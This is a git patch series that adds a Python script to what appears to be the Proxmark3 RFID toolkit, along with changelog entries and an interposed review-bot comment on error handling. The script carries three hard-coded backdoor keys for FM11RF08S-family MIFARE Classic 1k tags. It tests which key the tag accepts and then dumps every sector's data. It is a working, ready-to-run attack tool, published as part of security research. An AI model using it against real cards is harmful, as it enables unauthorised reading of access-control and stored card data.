From 145cd67b0eb0e7c831743293e09f1b1d18bdaf1a Mon Sep 17 00:00:00 2001
From: Aptimex
Date: Wed, 9 Oct 2024 15:13:47 -0600
Subject: [PATCH 1/4] add mf_backdoor_dump script
---
 client/pyscripts/mf_backdoor_dump.py | 62 ++++++++++++++++++++++++++++
 1 file changed, 62 insertions(+)
 create mode 100644 client/pyscripts/mf_backdoor_dump.py
diff --git a/client/pyscripts/mf_backdoor_dump.py b/client/pyscripts/mf_backdoor_dump.py
new file mode 100644
index 000000000..e8836c358
--- /dev/null
+++ b/client/pyscripts/mf_backdoor_dump.py
@@ -0,0 +1,62 @@ +#!/usr/bin/env python3 + +# Uses the backdoor keys for the FM11RF08S (and similar) chipsets to quickly dump all the data they can read +# Tested on vulnerable 1k chips only +# Based on the work in this paper: https://eprint.iacr.org/2024/1275 + +import pm3 +import os + +TOTAL_SECTORS = 16 #1k chips + +BACKDOOR_KEYS = ["A396EFA4E24F", "A31667A8CEC1", "518B3354E760"] +WORKING_KEY = None + +required_version = (3, 8) +if sys.version_info < required_version: + print(f"Python version: {sys.version}") + print(f"The script needs at least Python v{required_version[0]}.{required_version[1]}. Abort.") + exit() +p = pm3.pm3() + +# Test all the keys first to see which one works (if any) +for bk in BACKDOOR_KEYS: + p.console(f"hf mf rdbl -c 4 --key {bk} --blk 0") + output = p.grabbed_output.split('\n') + + if "auth error" in output[0].lower(): + continue + elif "can't select card" in output[0].lower(): + print("Error reading the tag.") + exit() + else: + WORKING_KEY = bk + break + +if not WORKING_KEY: + print("None of the backdoor keys seem to work with this tag.") + exit() + +print(f"Backdoor key {WORKING_KEY} seems to work, dumping data...") +print("IMPORTANT: Only data blocks and access bytes can be dumped; keys will be shown as all 0's") + +header = False +# Read every sector +for i in range(TOTAL_SECTORS): + p.console(f"hf mf rdsc -c 4 --key {WORKING_KEY} -s {i}") + + start = False + for line in p.grabbed_output.split('\n'): + if not header: + print(line) + elif start and len(line) > 0: + print(line) + continue + + if "----------" in line: + start = True + header = True + continue + else: + continue + From c1dbe2f8c1d65a6d9b852f2230cde72dc5dc9986 Mon Sep 17 00:00:00 2001 From: Aptimex Date: Wed, 9 Oct 2024 15:21:41 -0600 Subject: [PATCH 2/4] add line to changelog --- CHANGELOG.md | 1 + 1 file changed, 1 insertion(+) diff --git a/CHANGELOG.md b/CHANGELOG.md index 5843bbcac..c0843d8d8 100644 --- a/CHANGELOG.md +++ b/CHANGELOG.md 
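Review bot: Every failure path in the new script — the tag cannot be selected, or none of the three backdoor keys is accepted — ends in a bare `exit()`, which exits with status 0, so a shell wrapper or batch run cannot tell a failed dump from a successful one; those paths should use `sys.exit(1)` (the version-check abort as well, if it is meant to be an error). The key probe also treats any first output line that contains neither "auth error" nor "can't select card" as success, so a differently worded error, or one reported on a later line, would set `WORKING_KEY` to a non-working key and then dump sixteen sectors of error text; checking the whole output with `any("auth error" in l.lower() for l in output)` and only accepting a key after a recognisable block line is safer — whether the client always reports errors on the first line I cannot confirm from here. `import os` is never used in the hunk and can be dropped. The inner loop's indentation is not recoverable in this view, but if the bare `continue` after the `elif ... print(line)` branch sits at loop-body level, the `if "----------" in line:` check below it is unreachable and `header` never becomes True; it should be indented under the `elif`.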
@@ -33,6 +33,7 @@ This project uses the changelog in accordance with [keepchangelog](http://keepac - Fixed hardnested on AVX512F #2410 (@xianglin1998) - Added `hf 14a aidsim` - simulates a PICC (like `14a sim`), and allows you to respond to specific AIDs and getData responses (@evildaemond) - Fixed arguments for `SimulateIso14443aTag` and `SimulateIso14443aInit` in `hf_young.c`, `hf_aveful.c`, `hf_msdsal.c`, `hf_cardhopper.c`, `hf_reblay.c`, `hf_tcprst.c` and `hf_craftbyte.c` (@archi) +- Added `mf_backdoor_dump.py` script that dumps FM11RF08S and similar (Mifare Classic 1k) tag data that can be directly read by known backdoor keys. ## [Backdoor.4.18994][2024-09-10] - Changed flashing messages to be less scary (@iceman1001) From 420afa279b590a5d322ee44908c8916740a09da0 Mon Sep 17 00:00:00 2001 From: Aptimex Date: Wed, 9 Oct 2024 15:23:28 -0600 Subject: [PATCH 3/4] add my username --- CHANGELOG.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/CHANGELOG.md b/CHANGELOG.md index c0843d8d8..105ddf738 100644 --- a/CHANGELOG.md +++ b/CHANGELOG.md @@ -33,7 +33,7 @@ This project uses the changelog in accordance with [keepchangelog](http://keepac - Fixed hardnested on AVX512F #2410 (@xianglin1998) - Added `hf 14a aidsim` - simulates a PICC (like `14a sim`), and allows you to respond to specific AIDs and getData responses (@evildaemond) - Fixed arguments for `SimulateIso14443aTag` and `SimulateIso14443aInit` in `hf_young.c`, `hf_aveful.c`, `hf_msdsal.c`, `hf_cardhopper.c`, `hf_reblay.c`, `hf_tcprst.c` and `hf_craftbyte.c` (@archi) -- Added `mf_backdoor_dump.py` script that dumps FM11RF08S and similar (Mifare Classic 1k) tag data that can be directly read by known backdoor keys. +- Added `mf_backdoor_dump.py` script that dumps FM11RF08S and similar (Mifare Classic 1k) tag data that can be directly read by known backdoor keys. (@Aptimex) ## [Backdoor.4.18994][2024-09-10] - Changed flashing messages to be less scary (@iceman1001) 
From bc7cc7c5deb95b926528b5757739fd27cdd4de5c Mon Sep 17 00:00:00 2001 From: Aptimex Date: Wed, 9 Oct 2024 16:00:15 -0600 Subject: [PATCH 4/4] fix missing import --- client/pyscripts/mf_backdoor_dump.py | 1 + 1 file changed, 1 insertion(+) diff --git a/client/pyscripts/mf_backdoor_dump.py b/client/pyscripts/mf_backdoor_dump.py index e8836c358..897e46381 100644 --- a/client/pyscripts/mf_backdoor_dump.py +++ b/client/pyscripts/mf_backdoor_dump.py @@ -6,6 +6,7 @@ import pm3 import os +import sys TOTAL_SECTORS = 16 #1k chips